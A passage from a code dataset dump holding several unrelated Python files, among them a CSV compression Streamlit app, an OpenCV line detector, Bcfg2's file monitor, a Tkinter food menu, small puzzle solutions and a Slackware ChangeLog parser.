expanded=True):\n st.write(\n f'''\n - Test File Details- File Name: {test_file} File Type: csv File Size: {ftest_size}\n - Size of mapping file which is used for decompression: {ftmap_size}\n - Size of compression csv file: {ftcomp_size}\n - Size of zipped file for above two: {ftzip_size}\n '''\n )\n with st.expander(\"ℹ️ - Test File Compression %:\", expanded=True):\n st.write(\n f'''\n - Test file is compressed - {tnumber}\n '''\n )\n\n csv_file = st.file_uploader(\"Please upload your own csv file\", type=['csv'], accept_multiple_files=False)\n if csv_file is not None:\n compression = data_compression()\n msg,df_map,train_df=compression.csvfile_compression(csv_file)\n if \"failed\" in msg:\n st.error(msg)\n\n msg=compression.save_output_files(df_map,train_df,file_mapping,file_compressed,zip_file_name)\n if \"failed\" in msg:\n st.error(msg)\n\n st.info(\"Data compression is completed for your CSV file. Please download the Zip.\")\n csv_size=csv_file.size\n fmap_size,map_size=compression.file_size(file_mapping)\n fcomp_size,comp_size=compression.file_size(file_compressed)\n fzip_size,zip_size=compression.file_size(zip_file_name)\n number=\"{:.2%}\".format((csv_size-(comp_size+map_size))/csv_size)\n\n with st.expander(\"ℹ️ - Compressed - Sample Data:\", expanded=True):\n st.write(train_df.head())\n\n with st.expander(\"ℹ️ - Results:\", expanded=True):\n st.write(\n f'''\n - Uploaded File Details- File Name: {csv_file.name} File Type: {csv_file.type} File Size: {compression.convert_bytes(csv_size)}\n - Size of mapping file which is used for decompression: {fmap_size}\n - Size of compression csv file: {fcomp_size}\n - Size of zipped file for above two: {fzip_size}\n '''\n )\n\n with st.expander(\"ℹ️ - Compression %:\", expanded=True):\n st.write(\n f'''\n - Your csv file is compressed - {number}\n '''\n )\n\n with open(zip_file_name, \"rb\") as fp:\n btn = st.download_button(\n label=\"Download ZIP\",\n data=fp,\n file_name=zip_file_name,\n mime=\"application/zip\"\n )\n #st.write(file_size(csv_file))\n\n except Exception as ex:\n st.error(\"Failed!:... \"+str(ex))\n\n# ------------------------------------------------------------------------------\n# Call main function using csv file as a input\n# This main function is used for testing purpose from local system\n# ------------------------------------------------------------------------------\ndef compression(csvfile='training_data_sales_10k.csv',file_mapping='mapping.txt',file_compressed='compressed.txt',zip_file_name='output.zip'):\n test_file=csvfile\n #file_mapping='mapping.txt'\n #file_compressed='compressed.txt'\n #zip_file_name = \"output.zip\"\n comp = data_compression()\n msg,df_map,train_df=comp.csvfile_compression(test_file)\n comp.save_output_files(df_map,train_df,file_mapping,file_compressed,zip_file_name)\n\n ftest_size,test_size=comp.file_size(test_file)\n ftmap_size,tmap_size=comp.file_size(file_mapping)\n ftcomp_size,tcomp_size=comp.file_size(file_compressed)\n ftzip_size,tzip_size=comp.file_size(zip_file_name)\n tnumber=\"{:.2%}\".format((test_size-(tcomp_size+tmap_size))/test_size)\n\n print(\"\")\n print(\"Result - Test CSV File...\")\n print(f\"Test File Details- Input File Name: {test_file} | File Type: csv | File Size: {ftest_size}\")\n print(f\"Size of mapping file which is used for decompression- Output File Name: {file_mapping} | File Size: {ftmap_size}\")\n print(f\"Size of compression csv file- Output File Name: {file_compressed} | File Size: {ftcomp_size}\")\n print(f\"Size of zipped file for above two- Output File Name: {zip_file_name} | File Size: {ftzip_size}\")\n print(\"\")\n print(\"Saving...\")\n print(f\"Test file is compressed - {tnumber}\")\n return True\n\nif __name__ == \"__main__\":\n try:\n print(\"Started - DateTime:\",datetime.datetime.now())\n compression()\n s_ui()\n print(\"compression is completed...\")\n print(\"End - DateTime:\",datetime.datetime.now())\n\n except Exception as msg:\n print(f'''Error {msg}''')\n","repo_name":"chinnappar-antony/datacompression","sub_path":"data_compression.py","file_name":"data_compression.py","file_ext":"py","file_size_in_byte":15947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71994069802","text":"import cv2\nimport numpy as np\n\nimage = cv2.imread('./images/road.jpg')\ngray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\ncanny = cv2.Canny(gray,50,150,apertureSize=3)\nlines = cv2.HoughLinesP(canny , 1 , np.pi/180 , 200 , minLineLength=100, maxLineGap=10)\n\nfor line in lines:\n x1,y1,x2,y2 = line[0]\n cv2.line(image,(x1,y1),(x2,y2),(0,255,0),2)\n\ncv2.imshow('image',image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n","repo_name":"jamAL108/Computer_vision","sub_path":"openCV_learn/probabilistic_Hough_Line.py","file_name":"probabilistic_Hough_Line.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28379798869","text":"\"\"\"Bcfg2.Server.FileMonitor provides the support for monitorung files.\"\"\"\n\nimport logging\nimport os\nimport stat\nfrom time import sleep, time\n\nlogger = logging.getLogger('Bcfg2.Server.FileMonitor')\n\n\ndef ShouldIgnore(event):\n \"\"\"Test if the event should be suppresed.\"\"\"\n # FIXME should move event suppression out of the core\n if event.filename.split('/')[-1] == '.svn':\n return True\n if event.filename.endswith('~') or \\\n event.filename.startswith('#') or event.filename.startswith('.#'):\n #logger.error(\"Suppressing event for file %s\" % (event.filename))\n return True\n return False\n\n\nclass Event(object):\n def __init__(self, request_id, filename, code):\n self.requestID = request_id\n self.filename = filename\n self.action = code\n\n def code2str(self):\n \"\"\"return static code for event\"\"\"\n return self.action\n\navailable = {}\n\n\nclass FileMonitor(object):\n \"\"\"File Monitor baseclass.\"\"\"\n def __init__(self, debug=False):\n object.__init__(self)\n self.debug = debug\n self.handles = dict()\n\n def get_event(self):\n return None\n\n def pending(self):\n return False\n\n def fileno(self):\n return 0\n\n def handle_one_event(self, event):\n if ShouldIgnore(event):\n return\n if event.requestID not in self.handles:\n logger.info(\"Got event for unexpected id %s, file %s\" %\n (event.requestID, event.filename))\n return\n if self.debug:\n logger.info(\"Dispatching event %s %s to obj %s\" \\\n % (event.code2str(), event.filename,\n self.handles[event.requestID]))\n try:\n self.handles[event.requestID].HandleEvent(event)\n except:\n logger.error(\"error in handling of gamin event for %s\" % \\\n (event.filename), exc_info=1)\n\n def handle_event_set(self, lock=None):\n count = 1\n event = self.get_event()\n start = time()\n if lock:\n lock.acquire()\n try:\n self.handle_one_event(event)\n while self.pending():\n self.handle_one_event(self.get_event())\n count += 1\n except:\n pass\n if lock:\n lock.release()\n end = time()\n logger.info(\"Handled %d events in %.03fs\" % (count, (end - start)))\n\n def handle_events_in_interval(self, interval):\n end = time() + interval\n while time() < end:\n if self.pending():\n self.handle_event_set()\n end = time() + interval\n else:\n sleep(0.5)\n\n\nclass FamFam(object):\n \"\"\"The fam object is a set of callbacks for\n file alteration events (FAM support).\n \"\"\"\n\n def __init__(self):\n object.__init__(self)\n self.fm = _fam.open()\n self.users = {}\n self.handles = {}\n self.debug = False\n\n def fileno(self):\n \"\"\"Return fam file handle number.\"\"\"\n return self.fm.fileno()\n\n def handle_event_set(self, _):\n self.Service()\n\n def handle_events_in_interval(self, interval):\n now = time()\n while (time() - now) < interval:\n if self.Service():\n now = time()\n\n def AddMonitor(self, path, obj):\n \"\"\"Add a monitor to path, installing a callback to obj.HandleEvent.\"\"\"\n mode = os.stat(path)[stat.ST_MODE]\n if stat.S_ISDIR(mode):\n handle = self.fm.monitorDirectory(path, None)\n else:\n handle = self.fm.monitorFile(path, None)\n self.handles[handle.requestID()] = handle\n if obj != None:\n self.users[handle.requestID()] = obj\n return handle.requestID()\n\n def Service(self, interval=0.50):\n \"\"\"Handle all fam work.\"\"\"\n count = 0\n collapsed = 0\n rawevents = []\n start = time()\n now = time()\n while (time() - now) < interval:\n if self.fm.pending():\n while self.fm.pending():\n count += 1\n rawevents.append(self.fm.nextEvent())\n now = time()\n unique = []\n bookkeeping = []\n for event in rawevents:\n if ShouldIgnore(event):\n continue\n if event.code2str() != 'changed':\n # process all non-change events\n unique.append(event)\n else:\n if (event.filename, event.requestID) not in bookkeeping:\n bookkeeping.append((event.filename, event.requestID))\n unique.append(event)\n else:\n collapsed += 1\n for event in unique:\n if event.requestID in self.users:\n try:\n self.users[event.requestID].HandleEvent(event)\n except:\n logger.error(\"handling event for file %s\" % (event.filename), exc_info=1)\n end = time()\n logger.info(\"Processed %s fam events in %03.03f seconds. %s coalesced\" %\n (count, (end - start), collapsed))\n return count\n\n\nclass Fam(FileMonitor):\n \"\"\"\n The fam object is a set of callbacks for\n file alteration events (FAM support).\n \"\"\"\n\n def __init__(self, debug=False):\n FileMonitor.__init__(self, debug)\n self.fm = _fam.open()\n\n def fileno(self):\n return self.fm.fileno()\n\n def AddMonitor(self, path, obj):\n \"\"\"Add a monitor to path, installing a callback to obj.HandleEvent.\"\"\"\n mode = os.stat(path)[stat.ST_MODE]\n if stat.S_ISDIR(mode):\n handle = self.fm.monitorDirectory(path, None)\n else:\n handle = self.fm.monitorFile(path, None)\n if obj != None:\n self.handles[handle.requestID()] = obj\n return handle.requestID()\n\n def pending(self):\n return self.fm.pending()\n\n def get_event(self):\n return self.fm.nextEvent()\n\n\nclass Pseudo(FileMonitor):\n \"\"\"\n The fam object is a set of callbacks for\n file alteration events (static monitor support).\n \"\"\"\n\n def __init__(self, debug=False):\n FileMonitor.__init__(self, debug=False)\n self.pending_events = []\n\n def pending(self):\n return len(self.pending_events) != 0\n\n def get_event(self):\n return self.pending_events.pop()\n\n def AddMonitor(self, path, obj):\n \"\"\"add a monitor to path, installing a callback to obj.HandleEvent\"\"\"\n handleID = len(list(self.handles.keys()))\n mode = os.stat(path)[stat.ST_MODE]\n handle = Event(handleID, path, 'exists')\n if stat.S_ISDIR(mode):\n dirList = os.listdir(path)\n self.pending_events.append(handle)\n for includedFile in dirList:\n self.pending_events.append(Event(handleID,\n includedFile,\n 'exists'))\n self.pending_events.append(Event(handleID, path, 'endExist'))\n else:\n self.pending_events.append(Event(handleID, path, 'exists'))\n if obj != None:\n self.handles[handleID] = obj\n return handleID\n\n\ntry:\n from gamin import WatchMonitor, GAMCreated, GAMExists, GAMEndExist, \\\n GAMChanged, GAMDeleted, GAMMoved\n\n class GaminEvent(Event):\n \"\"\"\n This class provides an event analogous to\n python-fam events based on gamin sources.\n \"\"\"\n def __init__(self, request_id, filename, code):\n Event.__init__(self, request_id, filename, code)\n action_map = {GAMCreated: 'created', GAMExists: 'exists',\n GAMChanged: 'changed', GAMDeleted: 'deleted',\n GAMEndExist: 'endExist', GAMMoved: 'moved'}\n if code in action_map:\n self.action = action_map[code]\n\n class Gamin(FileMonitor):\n \"\"\"\n The fam object is a set of callbacks for\n file alteration events (Gamin support)\n \"\"\"\n def __init__(self, debug=False):\n FileMonitor.__init__(self, debug)\n self.mon = WatchMonitor()\n self.counter = 0\n self.events = []\n\n def fileno(self):\n return self.mon.get_fd()\n\n def queue(self, path, action, request_id):\n \"\"\"queue up the event for later handling\"\"\"\n self.events.append(GaminEvent(request_id, path, action))\n\n def AddMonitor(self, path, obj):\n \"\"\"Add a monitor to path, installing a callback to obj.HandleEvent.\"\"\"\n handle = self.counter\n self.counter += 1\n mode = os.stat(path)[stat.ST_MODE]\n\n # Flush queued gamin events\n while self.mon.event_pending():\n self.mon.handle_one_event()\n\n if stat.S_ISDIR(mode):\n self.mon.watch_directory(path, self.queue, handle)\n else:\n self.mon.watch_file(path, self.queue, handle)\n self.handles[handle] = obj\n return handle\n\n def pending(self):\n return len(self.events) > 0 or self.mon.event_pending()\n\n def get_event(self):\n if self.mon.event_pending():\n self.mon.handle_one_event()\n return self.events.pop(0)\n\n available['gamin'] = Gamin\nexcept ImportError:\n # fall back to _fam\n pass\n\ntry:\n import _fam\n available['fam'] = FamFam\nexcept ImportError:\n pass\navailable['pseudo'] = Pseudo\n\nfor fdrv in ['gamin', 'fam', 'pseudo']:\n if fdrv in available:\n available['default'] = available[fdrv]\n break\n","repo_name":"solj/bcfg2-old","sub_path":"src/lib/Server/FileMonitor.py","file_name":"FileMonitor.py","file_ext":"py","file_size_in_byte":9761,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"27980032759","text":"# Złóż zamowienie !\r\n# Przykładowe menu jadłodajni z wielokrotną opcją wyboru\r\n# i podliczeniem całości kosztu\r\n\r\nfrom tkinter import *\r\n\r\nclass Menu(Frame):\r\n \"\"\" Aplikacja odzwierciedlająca restauracyjne menu.\r\n Można zamawiać różne potrawy czy napoje i dowiedzieć się\r\n od razu ile wyniesie całkowity koszt. \"\"\"\r\n def __init__(self, master):\r\n super(Menu, self).__init__(master)\r\n self.grid()\r\n self.create_widgets()\r\n\r\n def create_widgets(self):\r\n \"\"\" Utwórz widżety służące do wyboru potraw. \"\"\"\r\n # Etykieta z opisem\r\n Label(self,\r\n text = \"Wybierz to co byś chciał zamówić.\"\r\n ).grid(row = 0, column = 0, sticky = W)\r\n\r\n # Etykieta z instrukcją\r\n Label(self,\r\n text = \"Dolne okienko wyświetli sume pieniędzy do zapłaty\"\r\n ).grid(row = 1, column = 0, sticky = W)\r\n\r\n # Pola wyboru jedzenia\r\n self.kebab = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Kebab - 15zl\",\r\n variable = self.kebab,\r\n command = self.update_price\r\n ).grid(row = 2, column = 0, sticky = W)\r\n\r\n self.pizza = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Pizza - 20zl\",\r\n variable = self.pizza,\r\n command = self.update_price\r\n ).grid(row = 3, column = 0, sticky = W)\r\n\r\n self.hamburger = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Hamburger - 10zl\",\r\n variable = self.hamburger,\r\n command = self.update_price\r\n ).grid(row = 4, column = 0, sticky = W)\r\n\r\n self.cheeseburger = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Cheeseburger - 11zl\",\r\n variable = self.cheeseburger,\r\n command = self.update_price\r\n ).grid(row = 5, column = 0, sticky = W)\r\n\r\n self.pierogi = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Pierogi - 14zl\",\r\n variable = self.pierogi,\r\n command = self.update_price\r\n ).grid(row = 6, column = 0, sticky = W)\r\n\r\n self.placki = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Placki - 12zl\",\r\n variable = self.placki,\r\n command = self.update_price\r\n ).grid(row = 7, column = 0, sticky = W)\r\n\r\n self.cola = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Cola - 6zl\",\r\n variable = self.cola,\r\n command = self.update_price\r\n ).grid(row = 8, column = 0, sticky = W)\r\n\r\n self.herbata = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Herbata - 5zl\",\r\n variable = self.herbata,\r\n command = self.update_price\r\n ).grid(row = 9, column = 0, sticky = W)\r\n\r\n self.kawa = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Kawa - 9zl\",\r\n variable = self.kawa,\r\n command = self.update_price\r\n ).grid(row = 10, column = 0, sticky = W)\r\n\r\n self.piwo = BooleanVar()\r\n Checkbutton(self,\r\n text = \"Piwo - 8zl\",\r\n variable = self.piwo,\r\n command = self.update_price\r\n ).grid(row = 11, column = 0, sticky = W)\r\n\r\n # Utwórz pole tekstowe do wyświetlania wyników\r\n self.price_txt = Text(self, width = 40, height = 5)\r\n self.price_txt.grid(row = 12, column = 0, columnspan = 3)\r\n\r\n def update_price(self):\r\n \"\"\" Zaktualizuj pole tekstowe z łączną ceną wybranych produktów. \"\"\"\r\n price = 0\r\n\r\n if self.kebab.get():\r\n price += 15\r\n\r\n if self.pizza.get():\r\n price += 20\r\n\r\n if self.hamburger.get():\r\n price += 10\r\n\r\n if self.cheeseburger.get():\r\n price += 11\r\n\r\n if self.pierogi.get():\r\n price += 14\r\n\r\n if self.placki.get():\r\n price += 12\r\n\r\n if self.cola.get():\r\n price += 6\r\n\r\n if self.herbata.get():\r\n price += 5\r\n\r\n if self.kawa.get():\r\n price += 9\r\n\r\n if self.piwo.get():\r\n price += 8\r\n\r\n # Wyświetl wyniki\r\n price2 = str(price) + \"zł\"\r\n self.price_txt.delete(0.0, END)\r\n self.price_txt.insert(0.0, price2)\r\n\r\n# część główna\r\nroot = Tk()\r\nroot.title(\"Menu\")\r\napp = Menu(root)\r\nroot.mainloop()","repo_name":"grokoko/Nauka","sub_path":"Rozdział 10/Zad 3.py","file_name":"Zad 3.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70845305644","text":"def rev(x):\n\tret = 0\n\twhile (x > 0):\n\t\tret = ret * 10 + x % 10\n\t\tx //= 10\n\treturn ret\n\na, b = map(int, input().split())\ntemp = rev(a) + rev(b)\ntemp = rev(temp)\nprint(temp)","repo_name":"famus2310/CP","sub_path":"TOKI/Dasar/10/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20440516728","text":"def arrowcount():\n n = int(input())\n loves = {a: b for _ in range(n) for a, b in [input().split()]}\n if n & 1:\n return -1\n lovecount = {k: 0 for k in loves.keys()}\n unloved = {k for k in loves.keys()}\n for v in loves.values():\n lovecount[v] += 1\n unloved.discard(v)\n loves = {k: v for k, v in loves.items() if v == k or loves[v] != k}\n cuts = 0\n while len(loves):\n if not len(unloved):\n unloved.add(next(iter(loves)))\n while len(unloved):\n u = unloved.pop()\n v = loves[u]\n loves.pop(u)\n if v in loves.keys():\n w = loves[v]\n if w in loves.keys():\n lovecount[w] -= 1\n if lovecount[w] == 0:\n unloved.add(w)\n loves.pop(v)\n cuts += 1\n return cuts\n\n\nprint(arrowcount())","repo_name":"DubiousDoggo/programming-challenges","sub_path":"kattis/lovepolygon.py","file_name":"lovepolygon.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21569342947","text":"class Solution:\n def solve(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n def dfs(x, y):\n if x < 0 or x >= len(board) or y < 0 or y >= len(board[0]) or board[x][y] == \"X\" or (x, y) in visited:\n return \n visited.add((x, y))\n dfs(x + 1, y)\n dfs(x - 1, y)\n dfs(x, y + 1)\n dfs(x, y - 1)\n\n visited = set()\n for i in range(len(board)):\n # left and right\n dfs(i, 0)\n dfs(i, len(board[0]) - 1)\n \n for i in range(len(board[0])):\n # upper and lower\n dfs(0, i)\n dfs(len(board) - 1, i)\n \n\n for i in range(len(board)):\n for j in range(len(board[0])):\n if (i, j) not in visited and board[i][j] == \"O\":\n board[i][j] = \"X\"\n ","repo_name":"wctseng99/leetcode-record","sub_path":"0130-surrounded-regions/0130-surrounded-regions.py","file_name":"0130-surrounded-regions.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42680613590","text":"'''\n#安装第三方模块\n#今天不是讲第三方模块怎么使用,而是讲如何使用第三方模块。\n\n#通过命令指示符终端\n\nMac:无需安装\nLinux:无需安装\nwindow:勾选了pip和Add python.exe to path\n\n'''\n\n'''\n安装第三方模块,需要知道模块的名字\npip --version\npillow 非常强大的处理图像的工具库\npip install Pillow\n如果报错 pip install --upgrade pip\n\npip -V 查看pip版本,以及pip目录\nprint(sys.path)\n\n'''\nfrom PIL import Image\n\n#打开图片\nim = Image.open(\"lena.tif\")\n#信息,大小,类型\nprint(im.format,im.size,im.mode)\n#设置图片的大小\nim.thumbnail((150,150))\n#保存为新图片\nim.save(\"tem.jpg\",\"JPEG\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hackergong/Python-TrainingCourseLearning","sub_path":"day007/8-第三方模块/第三方模块.py","file_name":"第三方模块.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17423323961","text":"import logging\nimport logging.handlers\nimport os\n\ncdir = os.path.dirname(__file__)\n\ndef get_logger(f='code'):\n logger = logging.getLogger(f)\n logger.setLevel(logging.DEBUG)\n #handler = logging.handlers.SysLogHandler(address = '/dev/log')\n handler = logging.FileHandler(os.path.join(cdir,'logging.log'))\n #handler = logging.FileHandler('{0}myLog_{1}-{2}-{3}.log'.format(myLogFileLocation, datem.year, datem.month, datem.day))\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n return logger\n\n# logging.basicConfig(filename='logging.log',\n# filemode='a',\n# format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n# datefmt='%H:%M:%S',\n# level=logging.DEBUG)\n\n","repo_name":"10acad/iboard10x","sub_path":"utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21674019090","text":"\"\"\"\n @author: HimanshuMittal01\n @organization: ripiktech\n\"\"\"\n\nimport os\nfrom typing import Union, Dict, Callable, List\nfrom pandas import DataFrame\nfrom pandas._typing import FilePath, ReadCsvBuffer\n\nPandasFilePath = Union[FilePath, ReadCsvBuffer[bytes], ReadCsvBuffer[str]]\n\n\nclass BaseLoader:\n def __init__(self, debug: bool = False, debug_dir: str = None) -> None:\n self.debug = debug\n self.debug_dir = debug_dir\n\n @property\n def required_keys(self) -> List[str]:\n raise NotImplementedError()\n\n @property\n def optional_keys(self) -> List[str]:\n raise NotImplementedError()\n\n @property\n def output_keys(self) -> List[str]:\n return [\n \"df_forecasted_demand\",\n \"df_inventory\",\n \"df_procurement_plan\",\n \"df_products_desc\",\n \"df_bom\",\n \"df_recipe\",\n \"df_plant_map\",\n \"df_room_changeover\",\n \"df_crossblock_penalties\",\n \"df_phantom_items\",\n \"df_machine_changeover\",\n \"df_machine_availability\",\n \"df_initial_state\",\n ]\n\n @classmethod\n def validate_keys(cls, func: Callable) -> Dict[str, DataFrame]:\n def inner(\n self, data_files: Dict[str, PandasFilePath], *args, **kwargs\n ) -> Dict[str, DataFrame]:\n # Validate input keys\n keys = data_files.keys()\n for required_key in self.required_keys:\n if required_key not in keys:\n raise ValueError(\n f\"'{required_key}' is required in input data keys!\"\n )\n\n for key in keys:\n if key not in self.required_keys and key not in self.optional_keys:\n raise ValueError(\n f\"'{key}' cannot be interpreted as input data keys!\"\n )\n\n # Load\n output = func(self, data_files, *args, **kwargs)\n\n # Validate output keys\n for output_key in self.output_keys:\n if output_key not in output:\n raise ValueError(f\"'{output_key}' not found. Check loader output!\")\n\n # Save if\n if self.debug:\n cleaned_dir = os.path.join(self.debug_dir, \"cleaned/\")\n if not os.path.exists(cleaned_dir):\n os.makedirs(cleaned_dir)\n\n for output_key, df in output.items():\n if df is None:\n continue\n df.to_csv(\n os.path.join(cleaned_dir, f\"{output_key}.csv\"),\n index=False,\n )\n\n return output\n\n return inner\n\n def load_all(self, data_files: Dict[str, PandasFilePath]) -> Dict[str, DataFrame]:\n raise NotImplementedError()\n","repo_name":"Vishruth-N/Ripik_Test","sub_path":"optimus/loaders/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34463217803","text":"\"\"\"\nSlackLog parsers\n================\n\nSlackLog parser takes a unicode representation of a Slackware ChangeLog.txt and produces an in-memory representation\nof it.\n\nThe in-memory representation is an instance of :any:`SlackLog`.\n\"\"\"\nfrom __future__ import print_function\n\nimport re\nimport hashlib\nfrom dateutil import parser\nfrom dateutil import tz\nfrom slacklog.models import SlackLog, SlackLogEntry, SlackLogPkg\nfrom codecs import encode\n\ntry:\n str = unicode\nexcept NameError:\n pass # Forward compatibility with Py3k (unicode is not defined)\n\n# pkg name starts from the beginning of line, and there's a colon followed by\n# a double space. But description can also contain \"something: \",\n# so \"something\" should contain either a slash or a dot for it to look like\n# a file name.\npkg_name_re = re.compile(r'\\A[-a-zA-Z0-9_]+[/.][-a-zA-Z0-9_+/.]*[*]?: ')\n\n# A regex for checking if the timestamp had 12-hour or 24-hour format\nam_pm_re = re.compile(r' [AaPp][Mm]? ')\n\ntzinfos = {\n 'CDT': -5 * 60 * 60,\n 'CST': -6 * 60 * 60,\n 'UTC': 0,\n }\n\n\nclass SlackLogParser (object):\n \"\"\"\n Parser for Slackware ChangeLog.txt files. This implementation works for 12.x and newer Slackware versions.\n \"\"\"\n\n def __init__(self):\n self.quiet = False\n \"\"\"If :py:const:`True`, warnings about date parsing are not printed.\"\"\"\n self.min_date = None\n \"\"\"If set to a :py:class:`datetime.datetime` object, older log entries are ignored (not parsed).\"\"\"\n self.ENTRY = 0\n \"\"\"Counter of entries (for debugging).\"\"\"\n self.PKG = 0\n \"\"\"Counter of packages (for debugging).\"\"\"\n\n def parse(self, data):\n \"\"\"\n Return the in-memory representation of the data.\n\n :param data: :py:class:`unicode` -- the ChangeLog.txt content.\n :returns: :any:`SlackLog` -- in-memory representation of data\n \"\"\"\n assert(isinstance(data, str))\n log = SlackLog()\n log.startsWithSeparator = re.match('\\A(\\+-+\\+[\\n]?)', data)\n log.endsWithSeparator = re.search('[\\n](\\+-+\\+[\\n]?)\\Z', data)\n if log.startsWithSeparator:\n data = data[log.startsWithSeparator.start():]\n log.startsWithSeparator = True\n else:\n log.startsWithSeparator = False\n if log.endsWithSeparator:\n data = data[:log.endsWithSeparator.start(1)]\n log.endsWithSeparator = True\n else:\n log.endsWithSeparator = False\n\n for entry_data in self.split_log_to_entries(data):\n entry = self.parse_entry(entry_data, log)\n if entry:\n log.entries.insert(0, entry)\n return log\n\n def split_log_to_entries(self, data):\n \"\"\"\n Split the ChangeLog.txt into a list of unparsed entries.\n\n :param data: :py:class:`unicode` --the ChangeLog.txt content.\n :returns: [:py:class:`unicode`] -- list of unparsed entries, separators removed.\n \"\"\"\n assert(isinstance(data, str))\n raw_entries = re.split('\\+-+\\+', data)\n entries = []\n for entry in raw_entries:\n entry = entry.lstrip()\n if entry and entry != \"\":\n entries.append(entry)\n entries.reverse()\n return entries\n\n def parse_entry(self, data, log):\n \"\"\"\n Parse a single ChangeLog entry.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content.\n :param log: :any:`SlackLog` -- in-memory representation that is being parsed.\n :return: :any:`SlackLogEntry` -- in-memory representation of the ChangeLog entry.\n \"\"\"\n assert(isinstance(data, str))\n assert(isinstance(log, SlackLog))\n self.ENTRY += 1\n self.PKG = 0\n checksum = self.gen_entry_checksum(data)\n parent = None\n if log.entries:\n parent = log.entries[0].identifier\n identifier = self.gen_entry_identifier(data, checksum, parent)\n else:\n identifier = self.gen_entry_identifier(data, checksum, None)\n timestamp, timezone, twelve_hour, data = self.parse_entry_timestamp(data)\n if self.min_date and self.min_date > timestamp:\n return None\n description, data = self.parse_entry_description(data)\n entry = SlackLogEntry(timestamp, description, log, checksum=checksum, identifier=identifier, parent=parent,\n timezone=timezone, twelveHourFormat=twelve_hour)\n for pkg_data in self.split_entry_to_pkgs(data):\n pkg = self.parse_pkg(pkg_data, entry)\n entry.pkgs.append(pkg)\n return entry\n\n def gen_entry_checksum(self, data):\n \"\"\"\n Generate ChangeLog entry checksum from data.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content.\n :return: :py:class:`unicode` -- Entry checksum.\n \"\"\"\n assert(isinstance(data, str))\n return u'%s' % hashlib.sha512(encode(data, 'utf-8')).hexdigest()\n\n def gen_entry_identifier(self, data, checksum, parent):\n \"\"\"\n Generate ChangeLog entry identifier from data, checksum, and/or parent identifier.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content.\n :param checksum: :py:class:`unicode` -- ChangeLog entry checksum.\n :param parent: :py:class:`unicode` -- Parent entry identifier or :py:const:`None`\n :return: :py:class:`unicode` -- Entry identifier.\n \"\"\"\n if parent is not None:\n return u'%s' % hashlib.sha512(encode(parent + checksum, 'utf-8')).hexdigest()\n return u'%s' % hashlib.sha512(encode(checksum, 'utf-8')).hexdigest()\n\n def parse_entry_timestamp(self, data):\n \"\"\"\n Parse ChangeLog entry timestamp from data.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content.\n :returns: [:py:class:`datetime.datetime`, :py:class:`tzinfo`, :py:class:`bool`, :py:class:`unicode`] --\n a four element list: timestamp in UTC, original timezone, :py:const:`True` if the timestamp had a 12-hour\n clock, and the rest of the entry.\n \"\"\"\n assert(isinstance(data, str))\n timestamp_str, data = self.get_line(data)\n timestamp, timezone = self.parse_date_with_timezone(timestamp_str)\n if am_pm_re.search(timestamp_str):\n return [timestamp, timezone, True, data]\n return [timestamp, timezone, False, data]\n\n def parse_entry_description(self, data):\n \"\"\"\n Parse ChangeLog entry description from data.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content (without timestamp).\n :returns: [:py:class:`unicode`, :py:class:`unicode`] -- a two element list: description and the rest of the entry.\n \"\"\"\n assert(isinstance(data, str))\n description = u''\n while data and not pkg_name_re.match(data):\n line, data = self.get_line(data)\n description += line\n return [description, data]\n\n def split_entry_to_pkgs(self, data):\n \"\"\"\n Split ChangeLog entry content into a list of unparsed packages.\n\n :param data: :py:class:`unicode` -- ChangeLog entry content (without timestamp or description).\n :return: [:py:class:`unicode`] -- a list of unparsed packages.\n \"\"\"\n assert(isinstance(data, str))\n pkgs = []\n pkg_lines = []\n if data == u'' or data == u'\\n':\n return []\n for line in data.split('\\n'):\n if not pkg_name_re.match(line):\n pkg_lines.append(line)\n else:\n if pkg_lines:\n # pkg_lines is not the last package in\n # the entry: add an extra newline\n pkgs.append('\\n'.join(pkg_lines) + '\\n')\n pkg_lines = []\n if line:\n pkg_lines.append(line)\n if pkg_lines:\n # last package in the 